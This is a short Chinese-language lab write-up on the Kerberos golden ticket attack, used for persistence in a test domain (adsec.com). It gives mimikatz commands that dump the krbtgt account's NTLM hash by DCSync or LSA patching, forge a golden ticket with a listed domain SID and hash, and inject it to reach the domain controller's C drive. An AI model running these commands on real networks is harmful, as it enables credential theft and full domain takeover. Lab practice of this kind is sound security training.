黄金票据主要用于权限维持,实验原理参考:黄金票据、白银票据 - 1_Ry - 博客园 (cnblogs.com)
本次实验重点掌握实现黄金票据的利用的过程
实验拓扑
实验思路:
1.获取 krbtgt账号口令 NTLM 值和域SID。
2.利用获取到的 NTLM和SID 值制作黄金票据
3.将黄金票据注入当前会话,获取权限。
1.
privilege::debug lsadump::dcsync /user:krbtgt@adsec.com
或者用 mimikatz lsadump::lsa /patch
2.
kerberos::golden /user:anyusername /domain:adsec.com /sid:S-1-5-21-922316221-3654735051-2036259581 /krbtgt:32e97fa2128ecc94c508f6bfa7eb46dd /ptt
3.当前会话具有访问域控C盘的权限
CS使用黄金票据可参考:在cs中使用黄金票据 - FreeBuf网络安全行业门户